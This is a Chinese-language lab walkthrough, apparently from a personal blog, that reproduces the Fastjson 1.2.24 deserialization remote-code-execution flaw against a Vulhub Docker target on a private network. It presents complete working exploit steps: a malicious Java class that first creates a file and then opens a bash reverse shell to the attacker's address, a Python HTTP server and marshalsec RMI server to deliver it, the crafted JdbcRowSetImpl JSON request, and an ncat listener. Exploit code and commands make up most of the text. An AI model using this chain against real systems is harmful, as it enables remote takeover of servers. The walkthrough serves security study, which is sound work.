环境准备:
(资料图片)
192.168.59.130 攻击机 window10
192.168.59.135 靶机centos8
声明:不涉及互联网上的资源,学习都在内网完成,一切皆用于学习记录,不可用于其他用途
环境准备:(自行baidu安装)可能环境准备比较折磨,问题会不断,慢慢来,有点耐心就行。
两台设备都安装1.8.0的jdk,python
window10:maven、marshalsec(反序列化环境)
centos8:安装docker 搭建vulhub靶场环境,要装docker-compose组件才能启动vulhub环境
我踩过的坑都在环境搭建,yum源用ali的吧,从本地到centos8的文件互传(xshell7),可以安装lszrz(应该是,忘了,可以查一下),尽可能用自己熟悉的Linux吧。
看了比较多文章,写的都挺好的。
明确一下复现原理:
被攻击者所在网站解析json时,没有对json的内容进行验证,就对json进行解析成java对象,然后去执行。攻击者可以构造对应的payload执行代码,去使被攻击者执行,达到代码执行或命令执行的目的,从而实现对被攻击者的安全测试。
话不多说,开干!!!!
目前所有准备就绪
centos8目录结构:
[root@192 ~]# lltotal 198796-rw-------. 1 root root 1177 Nov 16 2021 anaconda-ks.cfg-rw-r--r--. 1 root root 194042837 Jul 27 06:33 jdk-8u202-linux-x64.tar.gzdrwxr-xr-x. 5 root root 134 Jul 27 22:29 marshalsecdrwxr-xr-x. 120 root root 4096 Jul 27 06:18 vulhub
cd vulhub/fastjson/1.2.24-rce/ 进入vulhub的fastjson1.2.24这个目录
docker-compose up -d启动漏洞环境
测试:
访问:http://IP:8090
我在攻击机的E盘下新建了一个名为java的文件夹,然后新建一个TouchFile.java文件,写入以下代码:
// javac TouchFile.javaimport java.lang.Runtime;import java.lang.Process;public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"touch", "/tmp/success111111111"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } }}
在java路径下然后调出cmd命令行,直接回车,执行javac TouchFile.java,编译:
在Java的目录下的命令行中执行(要安装python,具体配置去baidu搜索):
python2 python -m SimpleHTTPServer 4444
python3 python3 -m http.server 4444
找到并进入marshalsec目录,直接cmd,启动RMI服务,监听9999端口并加载远程类TouchFile.class:
mvn clean package -DskipTests //有success,就成功了
然后会在marshalsec目录生成一个target目录,切换进去 发现生成了marshalsec-0.0.3-SNAPSHOT-all.jar:
cd target
开启rmi服务:这里的IP地址写攻击机开启http服务的地址
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.59.130:4444/#TouchFile" 9999
打开burp suite抓包,然后刷新http://192.168.59.135:8090,开始转圈圈:
来到burp suite:
修改payload,把请求体中的GET改成POST:
主要payload是红色框框住的那块
Content-Type:application/json //表明这个是json代码
Content-Length:164
下面有
这是我构造的payload,我看了网上很多,放进去都不行,触发不了漏洞:
POST / HTTP/1.1Host: 192.168.59.135:8090User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3;enAccept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0Content-Type: application/jsonContent-Length: 164{ "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.59.130:9999/TouchFile", "autoCommit":true }}
效果:
查看rmi
查看docker容器
docker ps
docker exec -it 容器id /bin/bash
!!!!成功写入创建文件
其实配置差不多
目前所有准备就绪
centos8目录结构:
[root@192 ~]# lltotal 198796-rw-------. 1 root root 1177 Nov 16 2021 anaconda-ks.cfg-rw-r--r--. 1 root root 194042837 Jul 27 06:33 jdk-8u202-linux-x64.tar.gzdrwxr-xr-x. 5 root root 134 Jul 27 22:29 marshalsecdrwxr-xr-x. 120 root root 4096 Jul 27 06:18 vulhub
cd vulhub/fastjson/1.2.24-rce/ 进入vulhub的fastjson1.2.24这个目录
docker-compose up -d启动漏洞环境
测试:
访问:http://IP:8090
我在攻击机的E盘下新建了一个名为java的文件夹,然后新建一个TouchFile.java文件,写入以下代码:
// javac TouchFile.javaimport java.lang.Runtime;import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.59.130/2333 0>&1"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } }}
在java路径下然后调出cmd命令行,直接回车,执行javac TouchFile.java,编译:
在Java的目录下的命令行中执行(要安装python,具体配置去baidu搜索):
python2 python -m SimpleHTTPServer 4444
python3 python3 -m http.server 4444
找到并进入marshalsec目录,直接cmd,启动RMI服务,监听9999端口并加载远程类TouchFile.class:
mvn clean package -DskipTests //有success,就成功了
然后会在marshalsec目录生成一个target目录,切换进去 发现生成了marshalsec-0.0.3-SNAPSHOT-all.jar:
cd target
开启rmi服务:这里的IP地址写攻击机开启http服务的地址
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.59.130:4444/#TouchFile" 9999
不同点来了(安装ncat,或者nmap,可以自行baidu,很简单,无脑下一步就行)
监听2333端口
centos8的命令:nc -lvp 2333
由于我用的是window10(我安装的nmap)需要找到ncat.exe所在目录,否则无法运行nc:ncat.exe -lvp 2333
打开burp suite抓包,然后刷新http://192.168.59.135:8090
修改payload,把请求体中的GET改成POST
主要payload是红色框框住的那块
Content-Type:application/json //表明这个是json代码
Content-Length:164
下面有
依旧用这个payload,构造完点GO:
POST / HTTP/1.1Host: 192.168.59.135:8090User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3;enAccept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0Content-Type: application/jsonContent-Length: 164{ "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.59.130:9999/TouchFile", "autoCommit":true }}
看效果:
这个成功反弹shell,拿下!!!!!!!!
完活!结束了fastjson1.2.24漏洞复现
整一个流程下来,其实脉络很清晰了,就是通过构造payload去让被攻击机触发攻击机设计好的代码,大半天操作就想说这句话。
结束了
注:未经同意请勿转载,仅作学习使用。以上有描述不正确之处,望大家能不吝指出,共同学习共同进步。谢谢